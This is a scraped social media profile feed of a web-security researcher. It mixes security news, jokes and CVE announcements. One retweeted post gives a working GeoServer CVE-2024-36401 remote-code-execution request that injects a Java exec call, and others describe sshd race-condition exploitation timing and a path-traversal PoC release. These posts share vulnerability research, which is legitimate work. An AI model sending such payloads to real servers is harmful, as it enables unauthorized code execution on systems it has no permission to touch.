Nightbane / Matt Keeley
@NightbanesFounder of ProDefense | Nerd who likes breaking web applications. | ex @bishopfox
Similar User
@bughuntar
@hacklido
@hetmehtaa
@linuxopsys
@444Yuki19
@AdguardFr
@termuxdevs
@thebinarybot
@HackerSploit
@davidbombal
@_JohnHammond
@clintgibler
@CristiVlad25
@inversecos
@payloadartist
New from 404 Media: police freaking out at iPhones stored for forensic examination mysteriously rebooting themselves. This makes brute forcing much harder. Cops hypothesize Apple pushed an update that tells nearby iPhones to reboot if not on phone network 404media.co/police-freak-o…
ever since i was young i dreamed of creating shareholder value via ai powered operating systems for the modern enterprise cloud
Uber moves to MySQL 8.0, reducing 94% of the lock time. Thanks to MySQL 8's new B+Tree locking model which I talked about in another post. First time I see the payoffs of that impressive design in a production shop.
A girl was scammed out of $1000 when she scanned a QR code for parking, but it turned out to be a fake sticker 😬
For beginners and professionals, OS-Surveillance offers AI-powered satellite image analysis. Simply zoom in and put marker on the location you want to research, and the AI will do the rest. Best of all, it's free for everyone. Register now and try it on os-surveillance.io…
Dependency is replaced by one-liner, weekly traffic is reduced by 440GB
This year's Crowdstrike booth at Blackhat:
Just released SquatSquasher: Automated detection of typosquatting domains! - Generates domain variations - Checks registration status - Analyses suspicious domains - Bulk domain checking Born from a work project, now available for all. Check it out: github.com/Stuub/SquatSqu…
This strange tweet got >25k retweets. The author sounds confident, and he uses lots of hex and jargon. There are red flags though... like what's up with the DEI stuff, and who says "stack trace dump"? Let's take a closer look... 🧵1/n
Crowdstrike : its fine u just have to manually visit the PC boot it into safe mode and remove a sys file US Organization with 50,000 pcs and a completely outsourced IT department in Bangalore : what
Hit by @CrowdStrike and just found out you don't have the necessary BitLocker Recovery keys? We might have a solution for you 😜😇 In our two day hardware training at @BlackHatEvents we teach how to break BitLocker TPM only setups by sniffing the communication between the CPU…
Donald Trump was shot at during recent Trump rally.
This... Just creates a WordPress user with the name "admin"... There is no vulnerability here. This could only be an issue if the site is configured to set every new user role as an Administrator but that would be exceedingly rare and it wouldn't matter what your username is.
🚨Alert🚨CVE-2024-36401 (CVSS 9.8): GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions 🔥PoC: github.com/vulhub/vulhub/… 📊6.4K+ Services are found on hunter.how 🔗Hunter Link: hunter.how/list?searchVal… 👇Search Query Hunter:…
CVE-2024-36401 POC: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 From: github.com/vulhub/vulhub/… #cve #poc
#CVE_2024_6387 Finally, if sshd cannot be updated or recompiled, this signal handler race condition can be fixed by simply setting LoginGraceTime to 0 in the configuration file. This makes sshd vulnerable to a denial of service (the exhaustion of all MaxStartups connections),…
#CVE_2024_6387 With this change in strategy, it takes ~10,000 tries on average to win the race condition; i.e., with 100 connections (MaxStartups) accepted per 120 seconds (LoginGraceTime), it takes ~3-4 hours on average to win the race condition, and ~6-8 hours to obtain a…
🚨PoC RELEASED🚨CVE-2024-28995; Automated Path Traversal & Local File Read
United States Trends
- 1. #JinOnFallon 353 B posts
- 2. #RHOSLC 7.960 posts
- 3. #CMAawards 19,1 B posts
- 4. Diddy 91,3 B posts
- 5. Nikki 45,6 B posts
- 6. Sixers 15,3 B posts
- 7. #My82Playlist N/A
- 8. #AEWDynamite 26,6 B posts
- 9. Adani 357 B posts
- 10. Paul George 8.712 posts
- 11. Suns 11 B posts
- 12. Happy Birthday Nerissa 4.655 posts
- 13. Coachella 562 B posts
- 14. Bitcoin 593 B posts
- 15. Jalen Brunson 3.216 posts
- 16. seokjin 138 B posts
- 17. Mark Sears N/A
- 18. Dunn 4.663 posts
- 19. Grayson Allen N/A
- 20. Beal 1.500 posts
Who to follow
-
MD Sagor Hossain (Professor) 🇧🇩
@bughuntar -
HACKLIDO
@hacklido -
Het Mehta
@hetmehtaa -
Linuxopsys
@linuxopsys -
☾.*·̩͙Yukito🐾
@444Yuki19 -
AdGuard en Français
@AdguardFr -
Termux Devs
@termuxdevs -
Nithin 🦹♂️
@thebinarybot -
HackerSploit
@HackerSploit -
David Bombal
@davidbombal -
John Hammond
@_JohnHammond -
Clint Gibler
@clintgibler -
🇷🇴 cristi
@CristiVlad25 -
✞ inversecos
@inversecos -
payloadartist
@payloadartist
Something went wrong.
Something went wrong.